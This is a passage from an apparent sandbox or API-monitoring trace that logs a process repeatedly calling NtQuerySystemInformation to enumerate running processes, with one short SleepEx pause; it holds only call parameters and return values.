SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.696] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0173.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17810) returned 0x0 [0173.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17850) returned 0x0 [0173.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16f38) returned 0x0 [0173.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, 